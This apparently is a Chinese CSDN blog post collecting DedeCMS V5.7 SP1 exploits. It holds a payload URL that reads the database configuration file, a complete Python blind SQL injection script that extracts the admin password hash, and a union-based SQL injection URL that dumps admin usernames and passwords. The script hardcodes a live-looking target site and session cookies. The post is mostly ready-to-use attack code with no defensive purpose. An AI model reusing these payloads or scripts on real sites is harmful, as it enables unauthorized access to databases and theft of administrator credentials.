dedecms的漏洞

爆数据库 Dedecms V5.7 SP1:

直接payload一条龙服务哈

/plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0

SQL注入 Dedecms V5.7 SP1:

利用前提:member下注册功能开放
利用脚本:

#!/usr/bin/env python
# encoding:utf-8
# Date: 2015/12/25
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import re
import random
import urllib2


def Get_respone(mtype_url, mdata='', method='get'):
    '发送数据包函数'
    headers = {
        'Cookie': 'PIDDAV253154=2019041022304518294570; FVTDAV253154=636905322478704625; PHPSESSID=thsqq6s84lc9h2sicf0sv6ir91; DedeUserID=9981; DedeUserID__ckMd5=28f81f2935375e34; DedeLoginTime=1555069244; DedeLoginTime__ckMd5=05d1ba08e4f839e5; OrdersId=e6a1UlIFCQQBAVFUAFVbAlEEBFdbWgIEUg4AAwNhGmUFUwdXUgMABwkHMyoGWlo; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1; LVTDAV253154=636906957184017134; VTSDAV253154=4; MSTSDAV253154=0; VPSDAV253154=31; SIDDAV253154=f908f9d9a2844172a8e829fa19997301; LROIDDAV253154=1000'
    }
    try:
        request = urllib2.Request(mtype_url, headers=headers)
        if method == 'post':
            response = urllib2.urlopen(request, data=mdata, timeout=10).read()
        else:
            response = urllib2.urlopen(request, timeout=10).read()
    except Exception, msg:
        print u'[X] 我擦,出错了!', msg
        raise SystemExit()
    else:
        return response


def Create_id():
    '创建分类函数'
    print u'\n[!] 分类ID不存在,正在创建!'
    response = Get_respone(mtype_url + '?dopost=add', 'mtypename=hacker&channelid=1', method='post')
    if '增加分类成功' in response:
        print u'\n[!] 分类创建成功,请重新执行程序!'
    else:
        print u'\n[X] 分类创建失败,请手工创建!'


def Get_id():
    '获取分类ID函数'
    response = Get_respone(mtype_url)
    if '系统关闭了会员功能' in response:
        print u'会员中心关闭,漏洞不存在!'
        raise SystemExit()
    else:
        type_reg = re.compile('mtypename\[(\d+)\]')
        idlist = type_reg.findall(response)
        if idlist: return idlist[0]


def Get_hash(typeid):
    '盲注获取admin密码'
    adminhash = ''
    md5_chars = list('abcdefghijklmnopqrstuvwxyz0123456789QWERTYUIOPLKJHGFDSAZXCVBNM')
    try:
        for i in range(1, 17):
            flag = random.random()
            for j in md5_chars:
                payload_pre = "?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name]["
                payload_cent = urllib2.quote(
                        "a' and `'`.``.mtypeid or if(ascii (substr((select left(substring(pwd,4),16) from dede_admin limit 1),"
                        + str(i) + ",1))=" + str(ord(j)) + ",1,0) and mtypeid=" + str(typeid) + "#"
                )
                payload_end = "]=" + str(flag) + "&_FILES[mtypename][size]=.xxxx]"
                payload = payload_pre + payload_cent + payload_end
                payload_res = Get_respone(mtype_url + payload)
                # print response
                match_res = Get_respone(mtype_url)
                if str(flag) in match_res:
                    print u'[!] 爷,正在爆破第 [%-2d] 位,字符为: %s' % (i, j)
                    adminhash = adminhash + j
                    break
    except KeyboardInterrupt:
        print u'[!] 爷,按您的吩咐,已成功退出!'
    else:
        if adminhash == '':
            print u'[X] 爷,杯具了,漏洞不存在!'
        else:
            print u'\n[¤] 爷,爆破完毕!密码为:', adminhash


if __name__ == '__main__':
    mtype_url = 'http://www.13sr.com/member/mtypes.php'
    typeid = Get_id()
    if typeid is None:
        Create_id()
    else:
        Get_hash(typeid)


远程文件包含漏洞 Dedecms V5.7 SP1:

通杀SQL注入漏洞 DedeCMS V5.7 20140201之前:

payload:http://baidu.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or mid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111
已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 书香水墨 设计师:CSDN官方博客 返回首页